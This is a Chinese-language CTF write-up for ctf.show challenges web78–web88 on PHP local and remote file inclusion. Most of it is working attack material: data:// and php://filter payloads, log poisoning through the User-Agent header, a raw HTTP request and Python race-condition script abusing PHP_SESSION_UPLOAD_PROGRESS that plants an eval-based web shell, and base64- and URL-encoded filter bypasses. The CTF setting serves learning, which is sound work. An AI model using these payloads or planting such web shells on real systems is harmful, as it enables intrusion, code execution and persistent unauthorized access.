web78
?file=data://text/plain,<?php system("cat flag.php");?>
或者伪协议读也行。
web79
?file=data://text/plain,<?= system("cat flag*");?>
或者
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
其中data://可以换成data:
web80
方法一:远程文件包含
往VPS下面写马,然后远程包含:
?file=http://118.***.***.***/1.txt
方法二:日志文件包含
?file=/var/log/nginx/access.log
因此往UA头里面写马就可以了。nginx和apache的日志文件包含也是一个考点。
web81
方法同web80,但是远程包含不可用,因为过滤了冒号,包含日志文件写马即可。
web82
新姿势,学到了学到了,非常有意思的一个洞,利用PHP_SESSION_UPLOAD_PROGRESS进行session文件包含和条件竞争。
参考链接:
利用session.upload_progress进行文件包含和反序列化渗透
利用这个代码上传抓包:
<!DOCTYPE html>
<html>
<body>
<form action="" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>
要执行的命令写在PHP_SESSION_UPLOAD_PROGRESS中:
然后开始bp的无参数循环请求,注意更改PHPSESSID。
另一边同样条件竞争包含对应的session文件:
即可条件竞争得到flag。
POST / HTTP/1.1
Host: 110205c4-0a4a-467e-82e9-ded805f240cc.chall.ctf.show
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://110205c4-0a4a-467e-82e9-ded805f240cc.chall.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Cookie: PHPSESSID=feng
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvGEmmKnnXVzQVMQB
Content-Length: 317
------WebKitFormBoundaryvGEmmKnnXVzQVMQB
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
<?php system("cat fl0g.php");?>
------WebKitFormBoundaryvGEmmKnnXVzQVMQB
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/plain
111
------WebKitFormBoundaryvGEmmKnnXVzQVMQB--
web83
同上,脚本:
import io
import sys
import requests
import threading
host = 'http://0df0bded-da5c-4bcc-92bd-e871bb1427a5.chall.ctf.show/'
sessid = 'vrhtvjd4j1sd88onr92fm9t2sj'
def POST(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
session.post(
host,
data={
"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat *');fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');echo md5('1');?>"},
files={
"file":('a.txt', f)},
cookies={
'PHPSESSID':sessid}
)
def READ(session):
while True:
response = session.get(f'{host}?file=/tmp/sess_{sessid}')
# print(response.text)
if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text:
print('[+++]retry')
else:
print(response.text)
sys.exit(0)
with requests.session() as session:
t1 = threading.Thread(target=POST, args=(session, ))
t1.daemon = True
t1.start()
READ(session)
web84
同上
web85
同上
web86
同上
web87
参考文章:
谈一谈php://filter的妙用
file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2577%2572%2569%2574%2565%253d%2563%256f%256e%2576%2565%2572%2574%252e%2562%2561%2573%2565%2536%2534%252d%2564%2565%2563%256f%2564%2565%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%2531%252e%2570%2568%2570
content=aaPD9waHAgZXZhbCgkX1BPU1RbMF0pOz8%2B
file是php://filter/write=convert.base64-decode/resource=1.php,content去除前面的两个用来填充的a后面base64解密就是<?php eval($_POST[0]);?>
web88
学了后面的忘了前面的。。又忘了data协议也同样可以base64编码来绕过,太菜了。
因为只过滤了php,所以可以拿data协议来绕过,然后base64编码绕过:
?file=data://text/plain;base64,PD9waHAgZXZhbCgkX1BPU1RbMF0pOw
本来base64加密的结果是PD9waHAgZXZhbCgkX1BPU1RbMF0pOw==,但是因为过滤了=,因此把用来填充的=给去掉就可以了。